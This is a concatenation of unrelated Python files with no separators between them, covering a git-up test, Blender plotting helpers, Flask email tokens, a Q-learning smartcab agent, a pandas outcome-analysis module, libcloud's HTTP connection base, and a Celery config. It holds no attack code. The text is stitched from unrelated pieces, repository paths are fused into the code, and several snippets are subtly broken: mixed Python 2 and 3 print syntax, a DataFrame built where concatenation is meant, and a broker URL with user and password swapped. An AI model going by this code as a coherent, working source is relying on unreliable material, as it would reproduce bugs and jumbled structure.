master_path, master = init_master(test_name) # Prepare master repo master.git.checkout(b=test_name) # Clone to test repo path = join(basepath, test_name) master.clone(path, b=test_name) repo = Repo(path, odbt=GitCmdObjectDB) assert repo.working_dir == path # Modify file in master update_file(master, test_name) # Modify file in our repo contents = 'completely changed!' repo_file = join(path, testfile_name) write_file(repo_file, contents) repo.index.add([repo_file]) repo.index.commit(test_name) # Modify file in master update_file(master, test_name) @raises(RebaseError) def test_rebase_error(): """ Run 'git up' with a failing rebase """ os.chdir(repo_path) from PyGitUp.gitup import GitUp gitup = GitUp(testing=True) gitup.run() #!/usr/bin/python3 import hashlib import os import shutil import subprocess import tempfile import matplotlib as mpl import matplotlib.cm import numpy as np from blender import * import bmesh import bpy def addSphere(loc, size, accuracy=8): bpy.ops.mesh.primitive_uv_sphere_add( segments=2*accuracy, ring_count=accuracy, location=loc, size=size) return getNewObject() def addCylinder(loc, size, rot): bpy.ops.mesh.primitive_cylinder_add( vertices=256, location=loc, radius=size[0], depth=size[1], rotation=rot) return getNewObject() def addCircle(loc, size, rot): bpy.ops.curve.primitive_nurbs_circle_add( location=loc, radius=size, rotation=rot) return getNewObject() def addGrid(loc, size, rot, nn): bpy.ops.mesh.primitive_grid_add( location=loc, radius=size, rotation=rot, x_subdivisions=nn[0], y_subdivisions=nn[1]) return getNewObject() def normalizePoints(*args): return [np.array(xx) for xx in np.broadcast_arrays(*args)] def loadImageTexture(obj, path): image = bpy.data.images.load(path) texture = bpy.data.textures.new("Texture", type="IMAGE") texture.image = image texture.filter_type = "BOX" slot = obj.active_material.texture_slots.add() slot.texture = texture slot.texture_coords = "ORCO" return slot def addPlotLine(loc, xx, yy, zz, lw=0.05, addAsShapeKeyTo=None): xx, yy, zz = normalizePoints(xx, yy, zz) scene = bpy.context.scene curve = bpy.data.curves.new("Curve", "CURVE") obj = bpy.data.objects.new("Curve Object", curve) scene.objects.link(obj) scene.objects.active = obj curve.dimensions = "3D" spline = curve.splines.new("POLY") spline.points.add(len(xx) - 1) for point, x, y, z in zip(spline.points, xx, yy, zz): point.co = (loc[0]+x, loc[1]+y, loc[2]+z, 1) circle = addCircle(loc, lw, rad(0, 0, 0)) obj.data.bevel_object = circle obj.data.use_fill_caps = True mat = bpy.data.materials.new(name="Material") obj.data.materials.append(mat) shapeKey = obj.shape_key_add("Shape Key") obj.data.shape_keys.use_relative = False #mesh = objCurve.to_mesh(scene, False, "PREVIEW") #obj = bpy.data.objects.new("Mesh Object", mesh) #scene.objects.link(obj) #obj.matrix_world = objCurve.matrix_world #mat = bpy.data.materials.new(name="Material") #obj.data.materials.append(mat) #scene.objects.unlink(objCurve) #scene.objects.unlink(circle) #return obj return obj def addPlotLineAsShapeKey(loc, xx, yy, zz, obj): xx, yy, zz = normalizePoints(xx, yy, zz) shapeKey = obj.shape_key_add("Shape Key") for point, x, y, z in zip(shapeKey.data, xx, yy, zz): point.co = (loc[0]+x, loc[1]+y, loc[2]+z) return obj def addPlotSurface(loc, XX, YY, ZZ): XX, YY, ZZ = normalizePoints(XX, YY, ZZ) nn = XX.shape[::-1] obj = addGrid(loc, 1, rad(0, 0, 0), nn) for j in range(nn[0]): for i in range(nn[1]): obj.data.vertices[i+j*nn[0]].co = (XX[i,j], YY[i,j], ZZ[i,j]) slot = loadImageTexture(obj, getInPath("colorbar.png")) slot.mapping_x = "NONE" slot.mapping_y = "Z" slot.mapping_z = "NONE" obj.active_material.specular_intensity = 0.1 shapeKey = obj.shape_key_add("Shape Key") obj.data.shape_keys.use_relative = False return obj def addPlotSurfaceAsShapeKey(loc, XX, YY, ZZ, obj): XX, YY, ZZ = normalizePoints(XX, YY, ZZ) nn = XX.shape[::-1] shapeKey = obj.shape_key_add("Shape Key") for j in range(nn[0]): for i in range(nn[1]): shapeKey.data[i+j*nn[0]].co = (XX[i,j], YY[i,j], ZZ[i,j]) return obj def addPlotPoints(loc, ms, X): X = np.array(X) if X.shape[1] == 2: X = np.append(X, np.zeros((X.shape[0],)), axis=1) objs = [addSphere(x, ms) for x in X] return addParent(loc, objs) def addLogo(loc, n=2): r = 1 size, rot = (1, 0.2), rad(90, 0, 0) objs = [] pngNames = { (0, 0) : "circleBSpline.png", (1, 0) : "circleTopoOpt.png", (1, 1) : "circleBiomech.png", (1, 2) : "circleAlgorithm.png", (1, 3) : "circleSparseGrid.png", (1, 4) : "circleProof.png", (1, 5) : "circleFinance.png", } for i in range(n): phi = np.linspace(0, 2*np.pi, 7) corners = i*2*r * np.array([np.cos(phi), 7*[0], np.sin(phi)]).T for j in np.linspace(0, 6, max(6*i+1,2))[:-1]: k, t = int(j), j % 1 obj = addCylinder((1-t)*corners[k] + t*corners[k+1], size, rot) objs.append(obj) obj.active_material.diffuse_color = getColor("mittelblau") if i <= 1: loadImageTexture(obj, getInPath(pngNames[(i, j)])) return addParent(loc, objs) def roundCorners(obj, radius, corners=None): if corners is False: return if corners is not None: corners = [ {"nw" : 2, "ne" : 3, "sw" : 0, "se" : 1}.get(x, x) for x in corners ] vertexGroup = obj.vertex_groups.new(name="Vertex Group") vertexGroup.add(corners, 1, "ADD") modifier = obj.modifiers.new("Bevel", "BEVEL") modifier.width = radius modifier.segments = 128 modifier.use_only_vertices = True if corners is not None: modifier.limit_method = "VGROUP" modifier.vertex_group = vertexGroup.name #bpy.ops.object.modifier_apply(apply_as="DATA", modifier=modifier.name) def addRectangleHUD(loc, size, roundedCorners=None, rcRadius=0.1, color="hellblau"): bpy.ops.mesh.primitive_plane_add(location=loc) obj = bpy.context.object camera = bpy.context.scene.camera obj.scale = (size[0]/2, size[1]/2, 0) bpy.ops.object.transform_apply(scale=True) obj.location = (loc[0]+size[0]/2, loc[1]-size[1]/2, -loc[2]-0.01) obj.parent = camera constraint = obj.constraints.new("COPY_ROTATION") constraint.target = camera mat = bpy.data.materials.new(name="Material") mat.diffuse_color = getColor(color) mat.use_shadeless = True obj.data.materials.append(mat) roundCorners(obj, rcRadius, corners=roundedCorners) return obj def addCircleHUD(loc, size, color="hellblau"): return addRectangleHUD(loc, [size, size], rcRadius=size, color=color) def addPolygonHUD(loc, vertices, roundedCorners=None, rcRadius=0.1, color="hellblau"): n = len(vertices) mesh = bpy.data.meshes.new("Mesh") bMesh = bmesh.new() vertices = [bMesh.verts.new(vertex) for vertex in vertices] edges = [bMesh.edges.new([vertices[i], vertices[(i+1)%n]]) for i in range(n)] face = bMesh.faces.new(vertices) bMesh.to_mesh(mesh) bMesh.free() obj = bpy.data.objects.new("Polygon", mesh) bpy.context.scene.objects.link(obj) camera = bpy.context.scene.camera obj.location = (loc[0], loc[1], -loc[2]-0.01) obj.parent = camera constraint = obj.constraints.new("COPY_ROTATION") constraint.target = camera mat = bpy.data.materials.new(name="Material") mat.diffuse_color = getColor(color) mat.use_shadeless = True obj.data.materials.append(mat) roundCorners(obj, rcRadius, corners=roundedCorners) return obj def addLaTeX(loc, rot, text, scale=1.0, textWidth=r"\textwidth", color="black", contourColor=None): tex = r""" \documentclass{article} % language and encodings \usepackage[ngerman,american]{babel} % amsmath with improvements \usepackage{mathtools} % need T1 font encoding for Charter, % otherwise there will be "undefined font shape" warnings \usepackage[T1]{fontenc} % use Bitstream Charter as main font \usepackage[bitstream-charter]{mathdesign} % colors \usepackage{xcolor} % contours \usepackage{contour} % use display style by default (undo with \textstyle) \everymath{\displaystyle} % automatically replace "l" with \ell in math mode \makeatletter \mathcode`l="8000 \begingroup \lccode`\~=`\l \DeclareMathSymbol{\lsb@l}{\mathalpha}{letters}{`l} \lowercase{\gdef~{\ifnum\the\mathgroup=\m@ne \ell \else \lsb@l \fi}}% \endgroup \makeatother % define line colors (mix between MATLAB and matplotlib colors) \definecolor{C0}{rgb}{0.000,0.447,0.741} \definecolor{C1}{rgb}{0.850,0.325,0.098} \definecolor{C2}{rgb}{0.749,0.561,0.102} \definecolor{C3}{rgb}{0.494,0.184,0.556} \definecolor{C4}{rgb}{0.466,0.674,0.188} \definecolor{C5}{rgb}{0.301,0.745,0.933} \definecolor{C6}{rgb}{0.635,0.078,0.184} \definecolor{C7}{rgb}{0.887,0.465,0.758} \definecolor{C8}{rgb}{0.496,0.496,0.496} % define university CD colors \definecolor{anthrazit}{RGB}{62,68,76} \definecolor{mittelblau}{RGB}{0,81,158} \definecolor{hellblau}{RGB}{0,190,255} % omit page number \pagestyle{empty} \begin{document} \begin{minipage}{""" + textWidth + r"""} % don't justify text, set hyphenation penalty to zero \raggedright \hyphenpenalty=0 """ + ((r"\contour{" + contourColor + r"}{" + text + r"}") if contourColor is not None else text) + r""" \end{minipage}% \end{document} """ texHash = hashlib.sha512(tex.encode()).hexdigest() tmpName = "latex-{}.svg".format(texHash[:8]) tmpPath, tmpExists = useTmpFile(tmpName) if not tmpExists: with tempfile.TemporaryDirectory() as dir_: texPath = os.path.join(dir_, "temp.tex") with open(texPath, "w") as f: f.write(tex) subprocess.run(["lualatex", "temp.tex"], check=True, cwd=dir_) pdfPath = os.path.join(dir_, "temp.pdf") svgPath = os.path.join(dir_, "temp.svg") subprocess.run(["pdftocairo", "-svg", pdfPath, svgPath], check=True) subprocess.run( ["inkscape", "--without-gui", "-f", svgPath, "-D", "-l", svgPath], check=True) shutil.copy(svgPath, tmpPath) objs = bpy.data.objects[:] bpy.ops.import_curve.svg(filepath=tmpPath) objs = [obj for obj in bpy.data.objects if obj not in objs] for i, child in enumerate(objs): mat = bpy.data.materials.new(name="Material") if contourColor is None: curColor = color else: numberOfCopies = 16 if i < numberOfCopies * len(objs) / (numberOfCopies + 1): curColor = contourColor child.location = (*child.location[:2], child.location[2] - 1e-6) else: curColor = color mat.diffuse_color = getColor(curColor) child.data.materials[0] = mat obj = addParent(loc, objs) obj.scale = 3*[scale*100] obj.rotation_euler = rot return obj def addLaTeXHUD(loc, text, **kwargs): obj = addLaTeX(loc, rad(0, 0, 0), text, **kwargs) camera = bpy.context.scene.camera #direction = -camera.matrix_world.to_3x3().transposed()[2].normalized() #loc = (distance * direction)[:] obj.location = (loc[0], loc[1], -loc[2]) obj.parent = camera constraint = obj.constraints.new("COPY_ROTATION") constraint.target = camera for child in obj.children: mat = child.active_material mat.use_shadeless = True return obj api/users/emailtoken.py from itsdangerous import URLSafeTimedSerializer from flask_mail import Message from ..mail import mail from flask import render_template import os from ..config import DevConfig class Token: def __init__(self, cfg=DevConfig): self.key = cfg.SECRET_KEY self.passw = os.environ.get('SECURITY_PASSWORD_SALT') self.sender = cfg.MAIL_DEFAULT_SENDER def generate_confirmation_token(self, email): serializer = URLSafeTimedSerializer(self.key) return serializer.dumps(email, salt=self.passw) def confirm_token(self, token, expiration=3600): serializer = URLSafeTimedSerializer(self.key) try: email = serializer.loads( token, salt=self.passw, max_age=expiration ) except: return False else: return email class Email(Token): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def send_email(self, to, subject, template): msg = Message( subject, recipients=[to], html=template, sender=self.sender ) mail.send(msg) return "Message sent"from django.shortcuts import render from . import models from . import serializers from rest_framework import viewsets, status, mixins, generics class ContactReqViewSet(viewsets.ModelViewSet): """Manage contact requests in the database""" serializer_class = serializers.ContactReqSerializer queryset = models.ContactRequest.objects.all() import random import math from environment import Agent, Environment from planner import RoutePlanner from simulator import Simulator from collections import defaultdict import numpy as np import matplotlib.pyplot as plt import time import pandas as pd class LearningAgent(Agent): """An agent that learns to drive in the smartcab world.""" def __init__(self, env): super(LearningAgent, self).__init__( env) # sets self.env = env, state = None, next_waypoint = None, and a default color self.color = 'red' # override color self.planner = RoutePlanner(self.env, self) # simple route planner to get next_waypoint # TODO: Initialize any additional variables here self.counter = 0 self.gamma = 0.4 self.epsilon = 0.05 self.powert = 1 self.previous_state = None self.previous_action = None self.q = defaultdict(dict) self.score = 0 self.penalties = 0 self.counter = 0 self.df = self.df = pd.DataFrame(columns=('inputs', 'waypoint', 'action')) def reset(self, destination=None): self.planner.route_to(destination) # TODO: Prepare for a new trip; reset any variables here, if required self.previous_state = None self.previous_action = None self.score = 0 self.penalties = 0 self.counter += 1 def update(self, t): # Gather inputs self.next_waypoint = self.planner.next_waypoint() # from route planner, also displayed by simulator inputs = self.env.sense(self) # TODO: Select action according to your policy alpha = float(1) / (t**self.powert + 1) # TODO: Update state self.state = (self.next_waypoint, inputs['light'], inputs['oncoming'], inputs['right'], inputs['left']) action = take_action(self, self.state) reward = self.env.act(self, action) # TODO: Learn policy based on state, action, reward qsa = self.q[self.previous_state][self.previous_action] if self.previous_action in self.q[self.previous_state] else 0 qsa_prime = self.q[self.state][action] if action in self.q[self.state] else 0 self.q[self.state][action] = (1 - alpha) * qsa + alpha * (reward + self.gamma * qsa_prime) # print "deadline = {}, inputs = {}, action = {}, reward = {}".format(deadline, inputs, action, reward) # [debug] # TODO: update previous state and action self.previous_action = action self.previous_state = self.state # for statistics self.score += reward self.penalties += reward if reward < 0 else 0 # Add a row with current state, waypoint and action to dataframe if self.counter == 100: self.df.loc[len(self.df)] = [inputs, self.next_waypoint, action] print (t, self.env.get_deadline(self), reward) # save DataFrame when done if self.counter == 100 and (reward >= 10 or t == self.env.get_deadline(self)): print "saving" self.df.to_csv("actions.csv") def take_action(self, state): # pick one self.env.get_deadline(self) self.epsilon -= self.epsilon / 1000 # arbitrarily decreasing # print self.epsilon if random.uniform(0, 1) <= self.epsilon: return random.choice(self.env.valid_actions) else: # find q values associated to each valid action. If no q value is found use 0 q_values = [self.q[state][a] if a in self.q[state] else 0 for a in self.env.valid_actions] # find the valid actions with highest q values best = [i for i in range(len(self.env.valid_actions)) if q_values[i] == max(q_values)] return self.env.valid_actions[random.choice(best)] def run(): """Run the agent for a finite number of trials.""" # Set up environment and agent e = Environment() # create environment (also adds some dummy traffic) a = e.create_agent(LearningAgent) # create agent e.set_primary_agent(a, enforce_deadline=True) # specify agent to track # NOTE: You can set enforce_deadline=False while debugging to allow longer trials # Now simulate it sim = Simulator(e, update_delay=0, display=False) # create simulator (uses pygame when display=True, if available) # NOTE: To speed up simulation, reduce update_delay and/or set display=False sim.run(n_trials=100) # run for a specified number of trials # NOTE: To quit midway, press Esc or close pygame window, or hit Ctrl+C on the command-line """Below is the code for the simulation discussed in the report. For this simulation to work the code of environment.py must be changed to keep the results """ # def run(): # """Run the agent for a finite number of trials.""" # import matplotlib.pyplot as plt # start_time = time.time() # df = pd.DataFrame(columns=('values', 'gamma', 'powert', 'epsilon', 'average_penalty_last_10', 'average_score_last_10', 'average_outcome_last_10', 'last_outcome')) # for gamma in [x * 0.05 for x in range(0, 11)]: # for epsilon in [x * 0.05 for x in range(0, 11)]: # for powert in range(1, 3): # n_instances = 11 # last_10_penalties = np.zeros((n_instances, 10)) # last_10_scores = np.zeros((n_instances, 10)) # last_10_outcomes = np.zeros((n_instances, 10)) # for val in range(0, n_instances): # # Set up environment and agent # e = Environment() # create environment (also adds some dummy traffic) # a = e.create_agent(LearningAgent) # create agent # a.gamma = gamma # a.powert = powert # a.epsilon = epsilon # e.set_primary_agent(a, enforce_deadline=True) # specify agent to track # # NOTE: You can set enforce_deadline=False while debugging to allow longer trials # # # Now simulate it # sim = Simulator(e, update_delay=0, # display=False) # create simulator (uses pygame when display=True, if available) # # NOTE: To speed up simulation, reduce update_delay and/or set display=False # # # # n = 100 # sim.run(n_trials=n) # run for a specified number of trials # # print sim.env.results # indexes = np.array(range(0, n)) # scores = np.array([x[1] for x in sim.env.results]) # penalties = np.array([x[2] for x in sim.env.results]) # outcomes = np.array([x[0] for x in sim.env.results]) # last_10_penalties[val] = penalties[-10:] # last_10_scores[val] = scores[-10:] # last_10_outcomes[val] = outcomes[-10:] # # # #averaging # apenalty = np.average(np.average(last_10_penalties, axis=0), axis=0) # ascore = np.average(np.average(last_10_scores, axis=0), axis=0) # aoutcome = np.average(np.average(last_10_outcomes, axis=0), axis=0) # values = "Eps:{:.2f} Gamma:{:.2f} PowT:{:d}".format(epsilon, gamma, powert) # print values # print [values, gamma, powert, epsilon, apenalty, ascore, aoutcome] # df.loc[len(df)] = [values, gamma, powert, epsilon, apenalty, ascore, aoutcome, last_10_outcomes[9]] # df.to_csv("results.csv") # elapsed_time = time.time() - start_time # print "Simulation took {} seconds".format(elapsed_time) # NOTE: To quit midway, press Esc or close pygame window, or hit Ctrl+C on the command-line if __name__ == '__main__': run() JFLandrigan/eagleseagles/Exploratory/outcomes.py0 from eagles.Exploratory.utils import plot_utils as pu import pandas as pd import numpy as np from sklearn.preprocessing import StandardScaler, MinMaxScaler import statsmodels.api as sm import logging from IPython.display import display logger = logging.getLogger(__name__) pd.set_option("display.max_rows", None) pd.set_option("display.max_columns", None) pd.set_option("display.width", None) pd.set_option("display.max_colwidth", None) def _perform_regress( data: pd.DataFrame = None, outcome_type: str = None, outcome: str = None, fts: list = None, disp: bool = True, ) -> pd.DataFrame: # todo Should also add in regression plots to show the fits # set model based on binary or not tmp_data = data.copy(deep=True) tmp_data.dropna(subset=[outcome] + fts, axis=0, inplace=True) if outcome_type == "categorical": tmp_data[outcome] = tmp_data[outcome].astype(int) est = sm.Logit(tmp_data[outcome], tmp_data[fts]) est2 = est.fit(method="bfgs") else: est = sm.OLS(tmp_data[outcome], tmp_data[fts]) est2 = est.fit() results_summary = est2.summary() res = results_summary.tables[1] res = pd.read_html(res.as_html(), header=0, index_col=0)[0].reset_index() res.rename(columns={"index": "feature"}, inplace=True) if disp: display(res) return res def _get_proportions_by_outcomes( data: pd.DataFrame = None, outcome: str = None, categorical_fts: list = [], disp: bool = True, plot: bool = False, ) -> pd.DataFrame: cat_df = pd.DataFrame() for ft in categorical_fts: grp_df = data.groupby(ft, as_index=False)[outcome].agg("count") grp_df["proportion_samples"] = round((grp_df[outcome] / len(data)) * 100, 2) grp_df[ft] = list(map(lambda x: ft + "_" + str(x), grp_df[ft])) grp_df.columns = ["feature", "count", "proportion_samples"] cat_df = pd.DataFrame([cat_df, grp_df]) if disp: display(cat_df) if plot: pu.plot_proportions_by_outcome(data=data, outcome=outcome, fts=categorical_fts) return cat_df def _get_corr_to_outcome( data: pd.DataFrame = None, outcome: str = None, continuous_fts: list = [], disp: bool = True, plot: bool = False, ) -> pd.DataFrame: corrs = np.array([]) for ft in continuous_fts: corrs = np.append(corrs, data[[outcome, ft]].corr().iloc[0, 1]) corr_df = pd.DataFrame( { "outcome": np.repeat(outcome, len(continuous_fts)), "feature": continuous_fts, "correlation": corrs, } ) if disp: display(corr_df) return corr_df def _get_descriptives_by_outcome( data: pd.DataFrame = None, outcome: list = [], continuous_fts: list = [], descriptive_stats: list = [], disp: bool = True, plot: bool = False, ) -> pd.DataFrame: if len(descriptive_stats) == 0: descriptive_stats = ["mean", "median", "std", "min", "max"] grp_df = data.groupby(outcome, as_index=False)[continuous_fts].agg( descriptive_stats ) col_names = [stat + "_" + ft for ft in continuous_fts for stat in descriptive_stats] col_names = outcome + col_names grp_df.reset_index(inplace=True) grp_df.columns = col_names if disp: display(grp_df) if plot: pu.plot_outcome_boxes(data=data, outcome=outcome, fts=continuous_fts) return grp_df def stats_by_outcome( data: pd.DataFrame = None, outcome_type: str = "categorical", outcome: str = None, categorical_fts: list = [], continuous_fts: list = [], analyses: list = [], descriptive_stats: list = [], scale: str = None, disp: bool = True, # remove_outliers: bool = False, plot: bool = False, ) -> dict: """ :param data: expects pandas dataframe :param outcome_type: str type of outcome (i.e. categorical or continuous) :param outcome: str name of column containing the outcome :param continuous_fts: list of strings corresponding to column names of continuous features :param categorical_fts: list of strings corresponding to column names of categorical features :param analyses: list of desired analyses, options include descriptives (i.e. returns mean, median, max, min, std), proportions (i.e. proportion comparisons for categorical features), regress (i.e. returns significant predictors of the outcomes by performing regression using the features as predictors) :param scale: string indicating whether or not to scale the data. Expects either "standard" or "minmax" :param disp: default True, boolean indicator to display result dataframes :param plot: Boolean, default False. IF true plots are displayed :return: dictionary containing analyse keyed and result dataframe value pairs """ if outcome is None: logger.warning("No outcome passed in") return None analyses_dict = {} fts = categorical_fts + continuous_fts # if scale then scale the continuous features if scale: if scale == "standard": scaler = StandardScaler() elif scale == "minmax": scaler = MinMaxScaler() else: logger.warning("Scaler not supported") return None data[continuous_fts] = scaler.fit_transform(data[continuous_fts]) if len(analyses) == 0: analyses = ["descriptives", "proportions", "regress"] for a in analyses: # get the base descriptives for the continuous features by outcome if a == "descriptives": if outcome_type == "categorical": desc_df = _get_descriptives_by_outcome( data=data, outcome=[outcome], continuous_fts=continuous_fts, descriptive_stats=descriptive_stats, disp=disp, plot=plot, ) analyses_dict["descriptives"] = desc_df else: corr_df = _get_corr_to_outcome( data=data, outcome=outcome, continuous_fts=continuous_fts, disp=disp, plot=plot, ) analyses_dict["correlations"] = corr_df desc_df = _get_descriptives_by_outcome( data=data, outcome=categorical_fts, continuous_fts=[outcome], descriptive_stats=descriptive_stats, disp=disp, plot=plot, ) analyses_dict["desc_df"] = desc_df # get the proportion labels for categorical features by outcome elif a == "proportions" and len(categorical_fts) > 0: prop_df = _get_proportions_by_outcomes( data=data, outcome=outcome, categorical_fts=categorical_fts, disp=disp, plot=plot, ) analyses_dict["proportions"] = prop_df elif a == "regress": sig_df = _perform_regress( data=data, outcome=outcome, fts=fts, outcome_type=outcome_type, disp=disp, ) analyses_dict["regress"] = sig_df else: logger.warning(a + " not supported") return analyses_dict libcloud/common/base.py # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import httplib import urllib import time import hashlib import StringIO import ssl import os import socket import struct from pipes import quote as pquote import libcloud from libcloud.httplib_ssl import LibcloudHTTPSConnection from httplib import HTTPConnection as LibcloudHTTPConnection class RawResponse(object): def __init__(self, response=None): self._status = None self._response = None self._headers = {} self._error = None self._reason = None @property def response(self): if not self._response: self._response = self.connection.connection.getresponse() return self._response @property def status(self): if not self._status: self._status = self.response.status return self._status @property def headers(self): if not self._headers: self._headers = dict(self.response.getheaders()) return self._headers @property def reason(self): if not self._reason: self._reason = self.response.reason return self._reason class Response(object): """ A Base Response class to derive from. """ NODE_STATE_MAP = {} object = None body = None status = httplib.OK headers = {} error = None connection = None def __init__(self, response): self.body = response.read() self.status = response.status self.headers = dict(response.getheaders()) self.error = response.reason if not self.success(): raise Exception(self.parse_error()) self.object = self.parse_body() def parse_body(self): """ Parse response body. Override in a provider's subclass. @return: Parsed body. """ return self.body def parse_error(self): """ Parse the error messages. Override in a provider's subclass. @return: Parsed error. """ return self.body def success(self): """ Determine if our request was successful. The meaning of this can be arbitrary; did we receive OK status? Did the node get created? Were we authenticated? @return: C{True} or C{False} """ return self.status == httplib.OK or self.status == httplib.CREATED #TODO: Move this to a better location/package class LoggingConnection(): """ Debug class to log all HTTP(s) requests as they could be made with the C{curl} command. @cvar log: file-like object that logs entries are written to. """ log = None def _log_response(self, r): rv = "# -------- begin %d:%d response ----------\n" % (id(self), id(r)) ht = "" v = r.version if r.version == 10: v = "HTTP/1.0" if r.version == 11: v = "HTTP/1.1" ht += "%s %s %s\r\n" % (v, r.status, r.reason) body = r.read() for h in r.getheaders(): ht += "%s: %s\r\n" % (h[0].title(), h[1]) ht += "\r\n" # this is evil. laugh with me. ha arharhrhahahaha class fakesock: def __init__(self, s): self.s = s def makefile(self, mode, foo): return StringIO.StringIO(self.s) rr = r if r.chunked: ht += "%x\r\n" % (len(body)) ht += body ht += "\r\n0\r\n" else: ht += body rr = httplib.HTTPResponse(fakesock(ht), method=r._method, debuglevel=r.debuglevel) rr.begin() rv += ht rv += ("\n# -------- end %d:%d response ----------\n" % (id(self), id(r))) return (rr, rv) def _log_curl(self, method, url, body, headers): cmd = ["curl", "-i"] cmd.extend(["-X", pquote(method)]) for h in headers: cmd.extend(["-H", pquote("%s: %s" % (h, headers[h]))]) # TODO: in python 2.6, body can be a file-like object. if body is not None and len(body) > 0: cmd.extend(["--data-binary", pquote(body)]) cmd.extend([pquote("https://%s:%d%s" % (self.host, self.port, url))]) return " ".join(cmd) class LoggingHTTPSConnection(LoggingConnection, LibcloudHTTPSConnection): """ Utility Class for logging HTTPS connections """ def getresponse(self): r = LibcloudHTTPSConnection.getresponse(self) if self.log is not None: r, rv = self._log_response(r) self.log.write(rv + "\n") self.log.flush() return r def request(self, method, url, body=None, headers=None): headers.update({'X-LC-Request-ID': str(id(self))}) if self.log is not None: pre = "# -------- begin %d request ----------\n" % id(self) self.log.write(pre + self._log_curl(method, url, body, headers) + "\n") self.log.flush() return LibcloudHTTPSConnection.request(self, method, url, body, headers) class LoggingHTTPConnection(LoggingConnection, LibcloudHTTPConnection): """ Utility Class for logging HTTP connections """ def getresponse(self): r = LibcloudHTTPConnection.getresponse(self) if self.log is not None: r, rv = self._log_response(r) self.log.write(rv + "\n") self.log.flush() return r def request(self, method, url, body=None, headers=None): headers.update({'X-LC-Request-ID': str(id(self))}) if self.log is not None: pre = "# -------- begin %d request ----------\n" % id(self) self.log.write(pre + self._log_curl(method, url, body, headers) + "\n") self.log.flush() return LibcloudHTTPConnection.request(self, method, url, body, headers) class ConnectionKey(object): """ A Base Connection class to derive from. """ #conn_classes = (LoggingHTTPSConnection) conn_classes = (LibcloudHTTPConnection, LibcloudHTTPSConnection) responseCls = Response rawResponseCls = RawResponse connection = None host = '127.0.0.1' port = (80, 443) secure = 1 driver = None action = None def __init__(self, key, secure=True, host=None, force_port=None): """ Initialize `user_id` and `key`; set `secure` to an C{int} based on passed value. """ self.key = key self.secure = secure and 1 or 0 self.ua = [] if host: self.host = host if force_port: self.port = (force_port, force_port) def connect(self, host=None, port=None): """ Establish a connection with the API server. @type host: C{str} @param host: Optional host to override our default @type port: C{int} @param port: Optional port to override our default @returns: A connection """ host = host or self.host port = port or self.port[self.secure] kwargs = {'host': host, 'port': port} connection = self.conn_classes[self.secure](**kwargs) # You can uncoment this line, if you setup a reverse proxy server # which proxies to your endpoint, and lets you easily capture # connections in cleartext when you setup the proxy to do SSL # for you #connection = self.conn_classes[False]("127.0.0.1", 8080) self.connection = connection def _user_agent(self): return 'libcloud/%s (%s)%s' % ( libcloud.__version__, self.driver.name, "".join([" (%s)" % x for x in self.ua])) def user_agent_append(self, token): """ Append a token to a user agent string. Users of the library should call this to uniquely identify thier requests to a provider. @type token: C{str} @param token: Token to add to the user agent. """ self.ua.append(token) def request(self, action, params=None, data='', headers=None, method='GET', raw=False): """ Request a given `action`. Basically a wrapper around the connection object's `request` that does some helpful pre-processing. @type action: C{str} @param action: A path @type params: C{dict} @param params: Optional mapping of additional parameters to send. If None, leave as an empty C{dict}. @type data: C{unicode} @param data: A body of data to send with the request. @type headers: C{dict} @param headers: Extra headers to add to the request None, leave as an empty C{dict}. @type method: C{str} @param method: An HTTP method such as "GET" or "POST". @return: An instance of type I{responseCls} """ if params is None: params = {} if headers is None: headers = {} self.action = action self.method = method # Extend default parameters params = self.add_default_params(params) # Extend default headers headers = self.add_default_headers(headers) # We always send a content length and user-agent header headers.update({'User-Agent': self._user_agent()}) headers.update({'Host': self.host}) # Encode data if necessary if data != '' and data != None: data = self.encode_data(data) if data is not None: headers.update({'Content-Length': str(len(data))}) if params: url = '?'.join((action, urllib.urlencode(params))) else: url = action # Removed terrible hack...this a less-bad hack that doesn't execute a # request twice, but it's still a hack. self.connect() try: # @TODO: Should we just pass File object as body to request method # instead of dealing with splitting and sending the file ourselves? if raw: self.connection.putrequest(method, action) for key, value in headers.iteritems(): self.connection.putheader(key, value) self.connection.endheaders() else: self.connection.request(method=method, url=url, body=data, headers=headers) except ssl.SSLError, e: raise ssl.SSLError(str(e)) if raw: response = self.rawResponseCls() else: response = self.responseCls(self.connection.getresponse()) response.connection = self return response def add_default_params(self, params): """ Adds default parameters (such as API key, version, etc.) to the passed `params` Should return a dictionary. """ return params def add_default_headers(self, headers): """ Adds default headers (such as Authorization, X-Foo-Bar) to the passed `headers` Should return a dictionary. """ return headers def encode_data(self, data): """ Encode body data. Override in a provider's subclass. """ return data class ConnectionUserAndKey(ConnectionKey): """ Base connection which accepts a user_id and key """ user_id = None def __init__(self, user_id, key, secure=True, host=None, port=None): super(ConnectionUserAndKey, self).__init__(key, secure, host, port) self.user_id = user_id hello.py # -*- coding: utf8 -*- print('Hello world')withcouragetol/codebee-10l #!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import absolute_import, unicode_literals from celery import platforms from celery import Celery '''mysql 连接池配置 ''' mysql = { 'pool_name': 'shadowX_pool', 'host': '', # 数据库地址 'port': 3306, 'user': 'root', 'password': '', 'database': 'celery', 'pool_resize_boundary': 50, 'enable_auto_resize': True, # 'max_pool_size': 10 } '''redis 连接配置 ''' redis = { 'host': '', # redis 地址 'port': 6379, 'user': 'root', 'password': '', 'db': 0, } '''rabbitmq 连接配置 ''' rabbit = { 'host': '', # RMQ地址 'port': 5672, 'user': 'guest', 'password': '', 'db': 0, } def get_celery(): """ Celery 配置信息 """ # rabbitmq 地址 BROKER = 'amqp://'+rabbit['password']+':'+rabbit['user']+'@'+rabbit['host']+':'+str(rabbit['port']) # redis 地址 BACKEND = 'redis://'+redis['host']+':'+str(redis['port'])+"/"+str(redis['db']) CELERY_ACCEPT_CONTENT = ['json'] CELERY_TASK_SERIALIZER = 'json' CELERY_RESULT_SERIALIZER = 'json' CELERY_ENABLE_UTC = False CELERY_TIMEZONE = 'Asia/Shanghai' platforms.C_FORCE_ROOT = True # 创建 celery celery = Celery('worker', broker=BROKER, backend=BACKEND) # 定义任务发现 